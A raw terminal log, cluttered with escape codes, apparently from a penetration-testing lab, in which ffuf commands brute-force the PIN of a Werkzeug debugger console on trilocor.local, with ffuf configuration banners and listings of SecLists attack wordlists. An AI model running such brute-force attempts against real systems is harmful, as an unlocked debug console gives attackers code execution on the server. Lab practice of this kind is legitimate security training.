#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m #[4m-
request-proto#[24m http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[1m;#[0m#[K#[37C[8:59:57]#[0m#[46D
#[J#[A#[108C##[0m ####
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m #[4m-
request-proto#[24m http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[38C[8:59:57]#[0m#[50D####################[8D#[9D#################
#########[8D
#[J#[0;1;2mfile#[0m
#[J#[0m-request-proto#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m #[4m-
request-proto#[24m http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[38C[8:59:57]#[0m#[119D#
#[J#[0;1;2mfile#[0m
#[J#[0m-request-proto#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m #[4m-
request-proto#[24m http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[38C[8:59:57]#[0m#[120D#
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m #[4m-
request-proto#[24m http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[38C[8:59:57]#[0m#[121D##[39m #[4m-
#[4mr#[4me#[4mq#[4mu#[4me#[4ms#[4mt#[4m-#[4mp#[4mr#[4mo#[4mt#[4mo#[24m#[24m http -w
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mF#[4mu#[4mz#[4mz#[4mi#[4mn#[4mg#[4m/#[4m4#[4m-
#[4md#[4mi#[4mg#[4mi#[4mt#[4ms#[4m-#[4m0#[3C#[4m-
#[4m9#[3C#[4m.#[4mt#[4mx#[4mt#[24m#[24m #[75D#[1C#[24m-
#[24mr#[24me#[24mq#[24mu#[24me#[24ms#[24mt#[24m-#[24mp#[24mr#[24mo#[24mt#[24mo#[15D
#[J#[0;1;2mfile#[0m
#[J#[0mrequest.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[39C[8:59:57]#[0m#[122D###
#[J#[0;1;2mfile#[0m
#[J#[0mrequest.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[39C[8:59:57]#[0m#[125D#[8D
#[J#[0;1;2mfile#[0m
#[J#[0mrequest.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[39C[8:59:57]#[0m#[133D##[39m#[4mr#[4me#[4mq#[4mu#[4me#[4ms#[4mt#[
4m.#[4mt#[4mx#[4mt#[24m#[24m -request-proto http -w
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mF#[4mu#[4mz#[4mz#[4mi#[4mn#[4mg#[4m/#[4m4#[4m-
#[4md#[4mi#[4mg#[4mi#[4mt#[4ms#[4m-#[4m0#[3C#[4m-
#[4m9#[3C#[4m.#[4mt#[4mx#[4mt#[24m#[24m #[86D
#[J#[0;1;2mfile#[0m
#[J#[0mrequest.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[40C[8:59:57]#[0m#[134D#[?1l#>#[?2004l
#[J#[A#[20C
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://trilocor.local:7777/console?
__debugger__=yes&cmd=pinauth&pin=FUZZ&s=VOTZu249LbYRGXDEKzLs
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
:: Header : Connection: close
:: Header : Host: trilocor.local:7777
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0)
Gecko/20100101 Firefox/115.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Referer: http://trilocor.local:7777/console
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m965#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:00:39]#[148D#[?1h#=#[?
2004h
#[J#[A#[106C#[100D#[39mf#[39mf#[39mu#[39mf#[10C#[24mr#[24me#[24mq#[24mu#[24me#[24ms
#[24mt#[24m.#[24mt#[24mx#[24mt#[24C#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[24m/
#[24mF#[24mu#[24mz#[24mz#[24mi#[24mn#[24mg#[24m/#[24m4#[24m-
#[24md#[24mi#[24mg#[24mi#[24mt#[24ms#[24m-#[24m0#[24m0#[24m0#[24m0#[24m-
#[24m9#[24m9#[24m9#[24m9#[24m.#[24mt#[24mx#[24mt#[1C##[0m
#[J#[A#[106C#[100D#[32mf#[32mf#[32mu#[32mf#[39m#[10C#[4mr#[4me#[4mq#[4mu#[4me#[4ms#
[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[24C#[4m/#[4mu#[4ms#[4mr#[4m/
#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mF#[4mu#[4mz#[4mz#[4mi#[4mn#[4mg#[4m/#[4m4#[4m-
#[4md#[4mi#[4mg#[4mi#[4mt#[4ms#[4m-#[4m0#[4m0#[4m0#[4m0#[4m-
#[4m9#[4m9#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m#[1C
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[40C[9:00:39]#[0m#[48D-
#[J#[0;1;2mfile#[0m
#[J#[0m-request-proto#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -
#[K#[38C[9:00:39]#[0m#[47Df
#[J#[A#[110C
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -
fw#[K#[36C[9:00:39]#[0m#[44D4
#[J#[A#[111C
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://trilocor.local:7777/console?
__debugger__=yes&cmd=pinauth&pin=FUZZ&s=VOTZu249LbYRGXDEKzLs
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
:: Header : Host: trilocor.local:7777
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0)
Gecko/20100101 Firefox/115.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Referer: http://trilocor.local:7777/console
:: Header : Connection: close
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
________________________________________________
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m966#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:01:18]#[148D#[?1h#=#[?
2004h
#[J#[A#[112C##[0m ##
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fw
4#[K#[34C[9:01:18]#[0m#[44D##
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fw
4#[K#[34C[9:01:18]#[0m#[48D#
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fw
4#[K#[34C[9:01:18]#[0m#[49D#####[4m.#[24m#[24m #[24m-#[24mfw 4
#[9D#[47D#[24m/#[24mu#[24ms#[24mr#[24m/#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[24m/
#[24mF#[24mu#[24mz#[24mz#[24mi#[24mn#[24mg#[24m/#[24m4#[24m-
#[24md#[24mi#[24mg#[24mi#[24mt#[24ms#[24m-#[24m0#[24m0#[24m0#[24m0#[24m-
#[24m9#[24m9#[24m9#[24m9#[24m.
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000-9999. -fw
4#[K#[37C[9:01:18]#[0m#[52D##### -fw 4 #[11D
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000- -fw 4#[K#[42C[9:01:18]#[0m#[57D##### -fw
4 #[11D
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits- -fw 4#[K#[47C[9:01:18]#[0m#[62D####### -fw 4
#[13D
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/4- -fw 4#[K#[54C[9:01:18]#[0m#[69D## -fw 4
#[8D#[28D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4m
l#[4mi#[4ms#[4mt#[4ms#[4m/#[4mF#[4mu#[4mz#[4mz#[4mi#[4mn#[4mg#[4m/
#[24m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34m403#[0m/ #[01;34mAmounts#[0m/
#[01;34mDatabases#[0m/ #[01;34mLFI#[0m/
#[01;34mPolyglots#[0m/ #[01;34mSQLi#[0m/ #[01;34mUser-
Agents#[0m/ #[01;34mXSS#[0m/
#[0;1;2mfile#[0m
#[0m1-4_all_letters_a-z.txt 3-digits-000-999.txt 4-
digits-0000-9999.txt 5-digits-00000-99999.txt
6-digits-000000-999999.txt alphanum-case-extra.txt
alphanum-case.txt big-list-of-naughty-strings.txt
char.txt command-injection-commix.txt
country-codes.txt doble-uri-hex.txt
email-top-100-domains.txt environment-identifiers.txt
extensions-Bo0oM.txt extensions-compressed.fuzz.txt
extensions-most-common.fuzz.txt extensions-skipfish.fuzz.txt
extension-test.txt file-extensions-all-cases.txt
file-extensions-lower-case.txt file-extensions.txt file-
extensions-upper-case.txt FormatString-Jhaddix.txt
fuzz-Bo0oM-friendly.txt fuzz-Bo0oM.txt
FuzzingStrings-SkullSecurity.org.txt HTML5sec-Injections-Jhaddix.txt
http-request-methods.txt IBMMQSeries-channels.txt
JSON.Fuzzing.txt LDAP-active-directory-attributes.txt
LDAP-active-directory-classes.txt LDAP.Fuzzing.txt LDAP-
openldap-attributes.txt LDAP-openldap-classes.txt
#[J#[30m#[104m(MORE)#[39m#[49m#[13A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/#[24m -fw
4#[K#[56C[9:01:18]#[0m#[71D##[4m/#[4m4#[4m0#[4m3#[1m#[4m/#[0m#[24m -fw 4######
#[0;1;2mdirectory#[0m#[K#[K
#[7m403/ #[0m #[01;34mAmounts#[0m/ #[01;34mDatabases#[0m/
#[01;34mLFI#[0m/ #[01;34mPolyglots#[0m/ #[01;34mSQLi#[0m/
#[01;34mUser-Agents#[0m/ #[01;34mXSS#[0m/ #[K
#[0;1;2mfile#[0m#[K#[K
#[0m1-4_all_letters_a-z.txt 3-digits-000-999.txt 4-
digits-0000-9999.txt 5-digits-00000-99999.txt #[K
6-digits-000000-999999.txt alphanum-case-extra.txt
alphanum-case.txt big-list-of-naughty-strings.txt #[K
char.txt command-injection-commix.txt
country-codes.txt doble-uri-hex.txt #[K
email-top-100-domains.txt environment-identifiers.txt
extensions-Bo0oM.txt extensions-compressed.fuzz.txt #[K
extensions-most-common.fuzz.txt extensions-skipfish.fuzz.txt
extension-test.txt file-extensions-all-cases.txt #[K
file-extensions-lower-case.txt file-extensions.txt file-
extensions-upper-case.txt FormatString-Jhaddix.txt #[K
fuzz-Bo0oM-friendly.txt fuzz-Bo0oM.txt
FuzzingStrings-SkullSecurity.org.txt HTML5sec-Injections-Jhaddix.txt #[K
http-request-methods.txt IBMMQSeries-channels.txt
JSON.Fuzzing.txt LDAP-active-directory-attributes.txt#[K
LDAP-active-directory-classes.txt LDAP.Fuzzing.txt LDAP-
openldap-attributes.txt LDAP-openldap-classes.txt #[K
Metacharacters.fuzzdb.txt numeric-fields-only.txt os-
names-mutated.txt os-names.txt #[K
php-magic-methods.txt special-chars.txt SSI-
Injection-Jhaddix.txt template-engines-expression.txt #[K
template-engines-special-vars.txt Unicode.txt
UnixAttacks.fuzzdb.txt URI-hex.txt #[K
URI-XSS.fuzzdb.txt Windows-Attacks.fuzzdb.txt XML-
FUZZ.txt XSS-Fuzzing #[K
#[JXXE-Fuzzing.txt #[J
#[17A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/403#[1m#[4m/#[0m#[24m -fw
4#[K#[52C[9:01:18]#[0m#[67D
#[1B#[7m403/ #[0m
#[7m403/ #[0m
#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/403#[1m#[4m/#[0m#[24m -fw
4#[K#[52C[9:01:18]#[0m#[67D#####[4m1#[4m-
#[4m4#[0m#[4m_#[4ma#[4ml#[4ml#[4m_#[4ml#[4me#[4mtters_a-z.txt#[24m -fw 4######
#[1B#[01;34m403#[0m/
#[2B#[7m1-4_all_letters_a-z.txt #[0m
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt#[24m -fw
4#[K#[33C[9:01:18]#[0m#[48D#[23D#[4m3#[4m-#[4md#[4mi#[4mg#[4mi#[4mt#[4ms#[4m-
#[4m0#[4m0#[4m0#[4m-#[4m9#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m#[24m #[24m-#[24mfw 4
#[9D
#[3B#[38C#[7m3-digits-000-999.txt #[0m
1-4_all_letters_a-z.txt
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/3-digits-000-999.txt#[24m -fw
4#[K#[36C[9:01:18]#[0m#[51D
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/3-digits-000-999.txt#[24m#[1m #[0m -fw
4#[K#[35C[9:01:18]#[0m#[50D##[0m -fw 4 ########[?1l#>#[?2004l
#[J#[A#[103C
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://trilocor.local:7777/console?
__debugger__=yes&cmd=pinauth&pin=FUZZ&s=VOTZu249LbYRGXDEKzLs
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/3-digits-000-999.txt
:: Header : Host: trilocor.local:7777
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0)
Gecko/20100101 Firefox/115.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Referer: http://trilocor.local:7777/console
:: Header : Connection: close
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
________________________________________________
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m967#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:01:32]#[148D#[?1h#=#[?
2004h
#[J#[A#[110C##[0m ##
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[J-request-proto
#[Jrequest.txt #[JUninstaller.lnk #[Juser_list.txt
#[JZoneTransfer.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/3-digits-000-999.txt#[24m -fw
4#[K#[36C[9:01:32]#[0m#[46D#####
#[J#[0;1;2mfile#[0m
#[J#[0m3-digits-000-999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/3-digits-000-999.txt#[24m -fw
4#[K#[36C[9:01:32]#[0m#[51D#####[4m.#[24m#[24m #[24m-#[24mfw 4
#[9D#[45D#[24m/#[24mu#[24ms#[24mr#[24m/#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[24m/
#[24mF#[24mu#[24mz#[24mz#[24mi#[24mn#[24mg#[24m/#[24m3#[24m-
#[24md#[24mi#[24mg#[24mi#[24mt#[24ms#[24m-#[24m0#[24m0#[24m0#[24m-
#[24m9#[24m9#[24m9#[24m.
#[J#[0;1;2mfile#[0m
#[J#[0m3-digits-000-999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/3-digits-000-999. -fw 4#[K#[39C[9:01:32]#[0m#[54D#### -
fw 4 #[10D
#[J#[0;1;2mfile#[0m
#[J#[0m3-digits-000-999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/3-digits-000- -fw 4#[K#[43C[9:01:32]#[0m#[58D#### -fw 4
#[10D
#[J#[0;1;2mfile#[0m
#[J#[0m3-digits-000-999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/3-digits- -fw 4#[K#[47C[9:01:32]#[0m#[62D####### -fw 4
#[13D
#[J#[0;1;2mfile#[0m
#[J#[0m3-digits-000-999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
/usr/share/seclists/Fuzzing/3- -fw 4#[K#[54C[9:01:32]#[0m#[69D## -fw 4
#[8D#[28D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4m
l#[4mi#[4ms#[4mt#[4ms#[4m/#[4mF#[4mu#[4mz#[4mz#[4mi#[4mn#[4mg#[4m/
#[24m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34m403#[0m/ #[01;34mAmounts#[0m/
#[01;34mDatabases#[0m/ #[01;34mLFI#[0m/
#[01;34mPolyglots#[0m/ #[01;34mSQLi#[0m/ #[01;34mUser-
Agents#[0m/ #[01;34mXSS#[0m/
#[0;1;2mfile#[0m
#[0m1-4_all_letters_a-z.txt 3-digits-000-999.txt 4-
digits-0000-9999.txt 5-digits-00000-99999.txt
6-digits-000000-999999.txt alphanum-case-extra.txt
alphanum-case.txt big-list-of-naughty-strings.txt
char.txt command-injection-commix.txt
country-codes.txt doble-uri-hex.txt
email-top-100-domains.txt environment-identifiers.txt
extensions-Bo0oM.txt extensions-compressed.fuzz.txt
extensions-most-common.fuzz.txt extensions-skipfish.fuzz.txt
extension-test.txt file-extensions-all-cases.txt
file-extensions-lower-case.txt file-extensions.txt file-
extensions-upper-case.txt FormatString-Jhaddix.txt
fuzz-Bo0oM-friendly.txt fuzz-Bo0oM.txt
FuzzingStrings-SkullSecurity.org.txt HTML5sec-Injections-Jhaddix.txt
http-request-methods.txt IBMMQSeries-channels.txt
JSON.Fuzzing.txt LDAP-active-directory-attributes.txt
LDAP-active-directory-classes.txt LDAP.Fuzzing.txt LDAP-
openldap-attributes.txt LDAP-openldap-classes.txt
#[J#[30m#[104m(MORE)#[39m#[49m#[13A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/#[24m -fw
4#[K#[56C[9:01:32]#[0m#[71D##[4m/#[4m4#[4m0#[4m3#[1m#[4m/#[0m#[24m -fw 4######
#[0;1;2mdirectory#[0m#[K#[K
#[7m403/ #[0m #[01;34mAmounts#[0m/ #[01;34mDatabases#[0m/
#[01;34mLFI#[0m/ #[01;34mPolyglots#[0m/ #[01;34mSQLi#[0m/
#[01;34mUser-Agents#[0m/ #[01;34mXSS#[0m/ #[K
#[0;1;2mfile#[0m#[K#[K
#[0m1-4_all_letters_a-z.txt 3-digits-000-999.txt 4-
digits-0000-9999.txt 5-digits-00000-99999.txt #[K
6-digits-000000-999999.txt alphanum-case-extra.txt
alphanum-case.txt big-list-of-naughty-strings.txt #[K
char.txt command-injection-commix.txt
country-codes.txt doble-uri-hex.txt #[K
email-top-100-domains.txt environment-identifiers.txt
extensions-Bo0oM.txt extensions-compressed.fuzz.txt #[K
extensions-most-common.fuzz.txt extensions-skipfish.fuzz.txt
extension-test.txt file-extensions-all-cases.txt #[K
file-extensions-lower-case.txt file-extensions.txt file-
extensions-upper-case.txt FormatString-Jhaddix.txt #[K
fuzz-Bo0oM-friendly.txt fuzz-Bo0oM.txt
FuzzingStrings-SkullSecurity.org.txt HTML5sec-Injections-Jhaddix.txt #[K
http-request-methods.txt IBMMQSeries-channels.txt
JSON.Fuzzing.txt LDAP-active-directory-attributes.txt#[K
LDAP-active-directory-classes.txt LDAP.Fuzzing.txt LDAP-
openldap-attributes.txt LDAP-openldap-classes.txt #[K
Metacharacters.fuzzdb.txt numeric-fields-only.txt os-
names-mutated.txt os-names.txt #[K
php-magic-methods.txt special-chars.txt SSI-
Injection-Jhaddix.txt template-engines-expression.txt #[K
template-engines-special-vars.txt Unicode.txt
UnixAttacks.fuzzdb.txt URI-hex.txt #[K
URI-XSS.fuzzdb.txt Windows-Attacks.fuzzdb.txt XML-
FUZZ.txt XSS-Fuzzing #[K
#[JXXE-Fuzzing.txt #[J
#[17A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/403#[1m#[4m/#[0m#[24m -fw
4#[K#[52C[9:01:32]#[0m#[67D
#[1B#[7m403/ #[0m
#[7m403/ #[0m
#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/403#[1m#[4m/#[0m#[24m -fw
4#[K#[52C[9:01:32]#[0m#[67D#####[4m1#[4m-
#[4m4#[0m#[4m_#[4ma#[4ml#[4ml#[4m_#[4ml#[4me#[4mtters_a-z.txt#[24m -fw 4######
#[1B#[01;34m403#[0m/
#[2B#[7m1-4_all_letters_a-z.txt #[0m
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt#[24m -fw
4#[K#[33C[9:01:32]#[0m#[48D#[23D#[4m3#[4m-#[4md#[4mi#[4mg#[4mi#[4mt#[4ms#[4m-
#[4m0#[4m0#[4m0#[4m-#[4m9#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m#[24m #[24m-#[24mfw 4
#[9D
#[3B#[38C#[7m3-digits-000-999.txt #[0m
1-4_all_letters_a-z.txt
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/3-digits-000-999.txt#[24m -fw
4#[K#[36C[9:01:32]#[0m#[51D#[20D#[4m4#[11C#[4m0#[4m-
#[2C#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m -fw 4######
#[3B#[76C#[7m4-digits-0000-9999.txt #[0m
#[38C3-digits-000-999.txt
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[4mrequest.txt#[24m -request-proto http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fw
4#[K#[34C[9:01:32]#[0m#[49D#[22D#[4m5#[12C#[4m0#[4m-
#[3C#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m -fw 4######
